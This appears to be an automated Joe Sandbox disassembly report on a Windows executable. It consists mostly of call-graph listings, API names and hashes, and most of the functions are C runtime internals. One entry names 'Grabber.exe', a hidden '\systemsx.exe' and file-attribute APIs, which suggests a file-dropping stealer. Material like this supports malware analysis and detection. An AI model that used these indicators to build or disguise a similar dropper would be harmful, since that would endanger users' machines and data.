7ff79cd66cfc GetLastError 4892->4901 4894 7ff79cd670dd 4894->4886 4900 7ff79cd68588 EnterCriticalSection 4895->4900 4902 7ff79cd66d3d FlsSetValue 4901->4902 4907 7ff79cd66d20 4901->4907 4903 7ff79cd66d2d SetLastError 4902->4903 4904 7ff79cd66d4f 4902->4904 4903->4894 4918 7ff79cd670f4 4904->4918 4907->4902 4907->4903 4909 7ff79cd66d7c FlsSetValue 4912 7ff79cd66d88 FlsSetValue 4909->4912 4913 7ff79cd66d9a 4909->4913 4910 
7ff79cd66d6c FlsSetValue 4911 7ff79cd66d75 4910->4911 4914 7ff79cd6716c __free_lconv_num 5 API calls 4911->4914 4912->4911 4925 7ff79cd66934 4913->4925 4914->4903 4919 7ff79cd67105 _set_fmode 4918->4919 4920 7ff79cd67156 4919->4920 4921 7ff79cd6713a HeapAlloc 4919->4921 4924 7ff79cd65fc0 _set_fmode 2 API calls 4919->4924 4922 7ff79cd670d4 _set_fmode 10 API calls 4920->4922 4921->4919 4923 7ff79cd66d5e 4921->4923 4922->4923 4923->4909 4923->4910 4924->4919 4930 7ff79cd6680c 4925->4930 4942 7ff79cd68588 EnterCriticalSection 4930->4942 4945 7ff79cd66efb 4944->4945 4946 7ff79cd66ef1 4944->4946 4947 7ff79cd670d4 _set_fmode 11 API calls 4945->4947 4946->4945 4951 7ff79cd66f17 4946->4951 4948 7ff79cd66f03 4947->4948 4963 7ff79cd6519c 4948->4963 4950 7ff79cd66f0f 4950->4870 4951->4950 4952 7ff79cd670d4 _set_fmode 11 API calls 4951->4952 4952->4948 4954 7ff79cd6596d 4953->4954 4955 7ff79cd65928 4953->4955 4956 7ff79cd65996 4954->4956 4957 7ff79cd6716c __free_lconv_num 11 API calls 4954->4957 4955->4869 4958 7ff79cd6716c __free_lconv_num 11 API calls 4956->4958 4957->4954 4958->4955 4960 7ff79cd651ff 4959->4960 4961 7ff79cd64ed0 _invalid_parameter_noinfo_noreturn 14 API calls 4960->4961 4962 7ff79cd6521a GetCurrentProcess TerminateProcess 4961->4962 4966 7ff79cd65034 4963->4966 4967 7ff79cd6505f 4966->4967 4974 7ff79cd650d0 4967->4974 4969 7ff79cd65086 4970 7ff79cd650a9 4969->4970 4984 7ff79cd64db0 4969->4984 4971 7ff79cd650be 4970->4971 4973 7ff79cd64db0 _invalid_parameter_noinfo_noreturn 47 API calls 4970->4973 4971->4950 4973->4971 4993 7ff79cd64e18 4974->4993 4979 7ff79cd6510b 4979->4969 4980 7ff79cd651ec _invalid_parameter_noinfo_noreturn 17 API calls 4981 7ff79cd6519b 4980->4981 4982 7ff79cd65034 _invalid_parameter_noinfo_noreturn 47 API calls 4981->4982 4983 7ff79cd651b5 4982->4983 4983->4969 4985 7ff79cd64e03 4984->4985 4986 7ff79cd64dc3 GetLastError 4984->4986 4985->4970 4987 7ff79cd64dd3 4986->4987 4988 7ff79cd66dc4 _invalid_parameter_noinfo_noreturn 16 API calls 
4987->4988 4989 7ff79cd64dee SetLastError 4988->4989 4989->4985 4990 7ff79cd64e11 4989->4990 5019 7ff79cd66604 4990->5019 4994 7ff79cd64e34 GetLastError 4993->4994 4995 7ff79cd64e6f 4993->4995 4996 7ff79cd64e44 4994->4996 4995->4979 4999 7ff79cd64e84 4995->4999 5002 7ff79cd66dc4 4996->5002 5000 7ff79cd64eb8 4999->5000 5001 7ff79cd64ea0 GetLastError SetLastError 4999->5001 5000->4979 5000->4980 5001->5000 5003 7ff79cd66dfe FlsSetValue 5002->5003 5004 7ff79cd66de3 FlsGetValue 5002->5004 5006 7ff79cd66e0b 5003->5006 5007 7ff79cd64e5f SetLastError 5003->5007 5005 7ff79cd66df8 5004->5005 5004->5007 5005->5003 5008 7ff79cd670f4 _set_fmode 11 API calls 5006->5008 5007->4995 5009 7ff79cd66e1a 5008->5009 5010 7ff79cd66e38 FlsSetValue 5009->5010 5011 7ff79cd66e28 FlsSetValue 5009->5011 5012 7ff79cd66e44 FlsSetValue 5010->5012 5013 7ff79cd66e56 5010->5013 5014 7ff79cd66e31 5011->5014 5012->5014 5015 7ff79cd66934 _set_fmode 11 API calls 5013->5015 5016 7ff79cd6716c __free_lconv_num 11 API calls 5014->5016 5017 7ff79cd66e5e 5015->5017 5016->5007 5018 7ff79cd6716c __free_lconv_num 11 API calls 5017->5018 5018->5007 5035 7ff79cd69b30 5019->5035 5069 7ff79cd69ae8 5035->5069 5074 7ff79cd68588 EnterCriticalSection 5069->5074 5805 7ff79cd619dc 5812 7ff79cd62168 SetUnhandledExceptionFilter 5805->5812 5813 7ff79cd664dc 5814 7ff79cd6650d 5813->5814 5815 7ff79cd664f5 5813->5815 5815->5814 5816 7ff79cd6716c __free_lconv_num 11 API calls 5815->5816 5816->5814 6394 7ff79cd6651c 6395 7ff79cd6716c __free_lconv_num 11 API calls 6394->6395 6396 7ff79cd6652c 6395->6396 6397 7ff79cd6716c __free_lconv_num 11 API calls 6396->6397 6398 7ff79cd66540 6397->6398 6399 7ff79cd6716c __free_lconv_num 11 API calls 6398->6399 6400 7ff79cd66554 6399->6400 6401 7ff79cd6716c __free_lconv_num 11 API calls 6400->6401 6402 7ff79cd66568 6401->6402 6025 7ff79cd6e35e 6027 7ff79cd6e376 6025->6027 6032 7ff79cd6e3e1 6025->6032 6026 7ff79cd63200 _CreateFrameInfo 58 API calls 6028 7ff79cd6e3c3 6026->6028 6027->6026 
6027->6032 6029 7ff79cd63200 _CreateFrameInfo 58 API calls 6028->6029 6030 7ff79cd6e3d8 6029->6030 6031 7ff79cd665c4 47 API calls 6030->6031 6031->6032 6406 7ff79cd6e419 6407 7ff79cd62b5c __CxxCallCatchBlock 58 API calls 6406->6407 6411 7ff79cd6e42c 6407->6411 6408 7ff79cd6e46b __CxxCallCatchBlock 6409 7ff79cd63200 _CreateFrameInfo 58 API calls 6408->6409 6410 7ff79cd6e47f 6409->6410 6412 7ff79cd63200 _CreateFrameInfo 58 API calls 6410->6412 6411->6408 6414 7ff79cd62dbc __CxxCallCatchBlock 58 API calls 6411->6414 6413 7ff79cd6e48f 6412->6413 6414->6408 5817 7ff79cd699e4 GetProcessHeap 6033 7ff79cd6a264 6034 7ff79cd6a26f 6033->6034 6042 7ff79cd6bc3c 6034->6042 6055 7ff79cd68588 EnterCriticalSection 6042->6055 5818 7ff79cd631e0 5819 7ff79cd631fa 5818->5819 5820 7ff79cd631e9 5818->5820 5820->5819 5821 7ff79cd665f0 __std_exception_copy 13 API calls 5820->5821 5821->5819 5822 7ff79cd65ee0 5825 7ff79cd65e64 5822->5825 5832 7ff79cd68588 EnterCriticalSection 5825->5832 5906 7ff79cd62ea0 5907 7ff79cd665c4 47 API calls 5906->5907 5908 7ff79cd62ea9 5907->5908 6415 7ff79cd61b20 6416 7ff79cd62114 GetModuleHandleW 6415->6416 6417 7ff79cd61b27 __GetCurrentState 6416->6417 5909 7ff79cd6e49f 5912 7ff79cd62e10 5909->5912 5913 7ff79cd62e28 5912->5913 5914 7ff79cd62e3a 5912->5914 5913->5914 5916 7ff79cd62e30 5913->5916 5915 7ff79cd63200 _CreateFrameInfo 58 API calls 5914->5915 5918 7ff79cd62e3f 5915->5918 5917 7ff79cd62e38 5916->5917 5919 7ff79cd63200 _CreateFrameInfo 58 API calls 5916->5919 5918->5917 5920 7ff79cd63200 _CreateFrameInfo 58 API calls 5918->5920 5921 7ff79cd62e5f 5919->5921 5920->5917 5922 7ff79cd63200 _CreateFrameInfo 58 API calls 5921->5922 5923 7ff79cd62e6c 5922->5923 5924 7ff79cd665c4 47 API calls 5923->5924 5925 7ff79cd62e75 5924->5925 6056 7ff79cd6316c 6063 7ff79cd649cc 6056->6063 6061 7ff79cd63179 6064 7ff79cd649d4 6063->6064 6066 7ff79cd64a05 6064->6066 6068 7ff79cd63175 6064->6068 6076 7ff79cd64cc8 6064->6076 6067 7ff79cd64a14 __vcrt_uninitialize_locks 
DeleteCriticalSection 6066->6067 6067->6068 6068->6061 6069 7ff79cd632dc 6068->6069 6081 7ff79cd64b9c 6069->6081 6077 7ff79cd64a4c __vcrt_FlsAlloc 5 API calls 6076->6077 6078 7ff79cd64cfe 6077->6078 6079 7ff79cd64d08 6078->6079 6080 7ff79cd64d13 InitializeCriticalSectionAndSpinCount 6078->6080 6079->6064 6080->6079 6082 7ff79cd64a4c __vcrt_FlsAlloc 5 API calls 6081->6082 6083 7ff79cd64bc1 TlsAlloc 6082->6083 6085 7ff79cd61b6c 6088 7ff79cd61e60 6085->6088 6089 7ff79cd61b75 6088->6089 6090 7ff79cd61e83 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6088->6090 6090->6089 6418 7ff79cd6ad2c 6419 7ff79cd67fd0 68 API calls 6418->6419 6420 7ff79cd6ad35 6419->6420 6091 7ff79cd64068 6092 7ff79cd64095 __except_validate_context_record 6091->6092 6093 7ff79cd63200 _CreateFrameInfo 58 API calls 6092->6093 6094 7ff79cd6409a 6093->6094 6096 7ff79cd64182 6094->6096 6099 7ff79cd640f4 6094->6099 6112 7ff79cd64148 6094->6112 6095 7ff79cd641f0 6095->6112 6153 7ff79cd637e8 6095->6153 6106 7ff79cd641a1 6096->6106 6147 7ff79cd62bb0 6096->6147 6098 7ff79cd6416f 6138 7ff79cd627b4 6098->6138 6099->6098 6100 7ff79cd6414d 6099->6100 6101 7ff79cd64116 6099->6101 6099->6112 6100->6098 6105 7ff79cd64125 6100->6105 6114 7ff79cd633ec 6101->6114 6107 7ff79cd64299 6105->6107 6110 7ff79cd64137 6105->6110 6106->6095 6106->6112 6150 7ff79cd62bc4 6106->6150 6109 7ff79cd66604 __GetCurrentState 47 API calls 6107->6109 6111 7ff79cd6429e 6109->6111 6119 7ff79cd64574 6110->6119 6115 7ff79cd633fa 6114->6115 6116 7ff79cd66604 __GetCurrentState 47 API calls 6115->6116 6118 7ff79cd6340b 6115->6118 6117 7ff79cd63451 6116->6117 6118->6105 6120 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6119->6120 6121 7ff79cd645a3 6120->6121 6215 7ff79cd63348 6121->6215 6124 7ff79cd63200 _CreateFrameInfo 58 API calls 6136 7ff79cd645c0 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 6124->6136 6125 7ff79cd646b7 6126 7ff79cd63200 _CreateFrameInfo 58 API calls 6125->6126 6128 
7ff79cd646bc 6126->6128 6127 7ff79cd646f2 6129 7ff79cd66604 __GetCurrentState 47 API calls 6127->6129 6130 7ff79cd63200 _CreateFrameInfo 58 API calls 6128->6130 6132 7ff79cd646c7 6128->6132 6129->6132 6130->6132 6131 7ff79cd646d4 __FrameHandler3::GetHandlerSearchState 6131->6112 6132->6131 6133 7ff79cd66604 __GetCurrentState 47 API calls 6132->6133 6134 7ff79cd646fd 6133->6134 6135 7ff79cd62bb0 58 API calls Is_bad_exception_allowed 6135->6136 6136->6125 6136->6127 6136->6135 6137 7ff79cd62bd8 __FrameHandler3::FrameUnwindToEmptyState 58 API calls 6136->6137 6137->6136 6219 7ff79cd62818 6138->6219 6145 7ff79cd64574 __FrameHandler3::FrameUnwindToEmptyState 58 API calls 6146 7ff79cd62808 6145->6146 6146->6112 6148 7ff79cd63200 _CreateFrameInfo 58 API calls 6147->6148 6149 7ff79cd62bb9 6148->6149 6149->6106 6151 7ff79cd63200 _CreateFrameInfo 58 API calls 6150->6151 6152 7ff79cd62bcd 6151->6152 6152->6095 6233 7ff79cd64700 6153->6233 6155 7ff79cd66604 __GetCurrentState 47 API calls 6156 7ff79cd63cb6 6155->6156 6157 7ff79cd63c01 6196 7ff79cd63cb0 6157->6196 6201 7ff79cd63bff 6157->6201 6296 7ff79cd63cb8 6157->6296 6158 7ff79cd6392f 6158->6157 6159 7ff79cd63967 6158->6159 6170 7ff79cd63b31 6159->6170 6261 7ff79cd628e8 6159->6261 6161 7ff79cd63200 _CreateFrameInfo 58 API calls 6164 7ff79cd63c43 6161->6164 6162 7ff79cd63200 _CreateFrameInfo 58 API calls 6166 7ff79cd63896 6162->6166 6167 7ff79cd63c4a 6164->6167 6164->6196 6166->6167 6172 7ff79cd63200 _CreateFrameInfo 58 API calls 6166->6172 6168 7ff79cd61b90 _log10_special 8 API calls 6167->6168 6173 7ff79cd63c56 6168->6173 6169 7ff79cd63b4e 6176 7ff79cd63b70 6169->6176 6169->6201 6288 7ff79cd62788 6169->6288 6170->6169 6171 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6170->6171 6170->6201 6171->6169 6175 7ff79cd638a6 6172->6175 6173->6112 6177 7ff79cd63200 _CreateFrameInfo 58 API calls 6175->6177 6178 7ff79cd63c93 6176->6178 6179 7ff79cd63b86 6176->6179 6176->6201 6180 7ff79cd638af 6177->6180 6182 7ff79cd63200 

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
• Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
Similarity
• API ID: CloseHandle$AddressAttributesCreateFileLibraryLoadProcProcess
• String ID: Grabber.exe$SHGetFolderPathW$SetFileAttributesW$\systemsx.exe$kernel32.dll$shell32.dll

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF79CD696D8,?,?,00000000,00007FF79CD6864B,?,?,?,00007FF79CD65D19), ref: 00007FF79CD69670
• GetProcAddress.KERNEL32(?,?,?,00007FF79CD696D8,?,?,00000000,00007FF79CD6864B,?,?,?,00007FF79CD65D19), ref: 00007FF79CD6967C
Strings
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-

Control-flow Graph

APIs
Strings
Similarity
• API ID: String
• String ID: LCMapStringEx

Control-flow Graph

APIs
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 128 7ff79cd6116c-7ff79cd61192 129 7ff79cd61197-7ff79cd611c6 CreateFileW 128->129 130 7ff79cd61194 128->130 131 7ff79cd611cc-7ff79cd611f2 WriteFile CloseHandle 129->131 132 7ff79cd611c8-7ff79cd611ca 129->132 130->129 134 7ff79cd611f4-7ff79cd611fb 131->134 135 7ff79cd61200 131->135 133 7ff79cd61203-7ff79cd6121f call 7ff79cd61b90 132->133 134->135 136 7ff79cd611fd 134->136 135->133 136->135
APIs
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID:
                                                                                                                                                                                                                          • API String ID: 1065093856-0
                                                                                                                                                                                                                          • Opcode ID: 1de5265e70b36155833214aa989500a80106cc326832a612e1592c9f84b4bff4
                                                                                                                                                                                                                          • Instruction ID: a951b40582eca9a74ae7a9c6c80f5df0ea24cdcc0bbc9a4894b71e1c3c2eb7ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1de5265e70b36155833214aa989500a80106cc326832a612e1592c9f84b4bff4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51118132708E4246EB309F35A54576AB3B0BB89BE8F941230DAAD47784CE3DD445CB50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                          • Opcode ID: 9970b8f7cffa43d163a31991d0b0a315de01f85d4899b19f19aa1241bd85657f
                                                                                                                                                                                                                          • Instruction ID: 365f215f3303cd52b2f011be8a44219ed2d0e3d7440f8e3bbd2389a3c41a48e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9970b8f7cffa43d163a31991d0b0a315de01f85d4899b19f19aa1241bd85657f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33D06724B19E4746EF787B709A5D278B2715F48741B903839C84A06393EE2DA489C620

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Info
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                          • Opcode ID: def6ae39759c99b8442a1cb0086763bc1c342e8da2fadd83734d301a84aff10f
                                                                                                                                                                                                                          • Instruction ID: baea0fc8261db3318db2de0e588d995453d4af1533642e9288fcce66c7bcbd8e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: def6ae39759c99b8442a1cb0086763bc1c342e8da2fadd83734d301a84aff10f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF518E32B1CAC68AEB219F38D1943AEBBB0F748748F965136D68D47A85CB3CD145CB10

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF79CD679A8: GetOEMCP.KERNEL32 ref: 00007FF79CD679D2
                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(?,?,?,?,?,00000000,?,00007FF79CD67E15), ref: 00007FF79CD680B9
                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(?,?,?,?,?,00000000,?,00007FF79CD67E15), ref: 00007FF79CD680FD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                                                                          • Opcode ID: ae5910aece98d32cc3646f991b01a86ca2527d8335ae83298894c3b7adc5338a
                                                                                                                                                                                                                          • Instruction ID: 644215394ea830f58606ec810128b5d682c9b18140ad0e79a60d0ab9d3602111
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae5910aece98d32cc3646f991b01a86ca2527d8335ae83298894c3b7adc5338a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D81B062B08E8387EF74AB359A4417AF6B1EB48744FD86036C68E47691DE3CE645C320

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                          • Opcode ID: 24843ef6124b96e5061802c873c7f8ff446cc0eb4c12843afe46242c94801afe
                                                                                                                                                                                                                          • Instruction ID: 903835f3d848b9038b63b898d16beb9ed04887ec2cd97cdf27ed923f70062c41
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24843ef6124b96e5061802c873c7f8ff446cc0eb4c12843afe46242c94801afe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1216B32F04E068AEF24AF74C4482AC77B0EB4471CF95263AD65C46AC5EF78D485CBA0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: f65aabccbbc4481f6d2d60315144911fd1256f150aa1b1a7f28cdda443558235
                                                                                                                                                                                                                          • Instruction ID: 76f54b084da14e2f82d097fd144e96470edb720cc7f22961fee8836e237b6ee6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f65aabccbbc4481f6d2d60315144911fd1256f150aa1b1a7f28cdda443558235
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40113D32A18E4787FB20BB24E944569F3B5FB80788F992435E65D47692DF3CE910CB20

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF79CD61C70
                                                                                                                                                                                                                            • Part of subcall function 00007FF79CD63194: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF79CD6319C
                                                                                                                                                                                                                            • Part of subcall function 00007FF79CD63194: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF79CD631A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1208906642-0
                                                                                                                                                                                                                          • Opcode ID: bacd44578f9d11e0feaffbaaa14868b563015721ea4207bc6ef9450bb77db74f
                                                                                                                                                                                                                          • Instruction ID: 88948e69fe2a3ff85370a0224576c28cf1eceba035cfd990cb0e7be81b304c7c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bacd44578f9d11e0feaffbaaa14868b563015721ea4207bc6ef9450bb77db74f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE0B650F0DD0390FD78367513822BDF6700F26308FC13079D85E221C79E5E61569171

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF79CD66D5E,?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD67149
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                          • Opcode ID: 37772468927d3350c72d945f7f2cadb0cbb3eb1aa510c88c82fbf26afa4e02ae
                                                                                                                                                                                                                          • Instruction ID: 310b241b72eb485ebe69e89efc262bd842f29d03a3059c4e30ac111d738b7670
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37772468927d3350c72d945f7f2cadb0cbb3eb1aa510c88c82fbf26afa4e02ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F03794B09E0B41FE7876729A652B5A2B51F48B80F893432CD0E86382FE1CA481C270
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
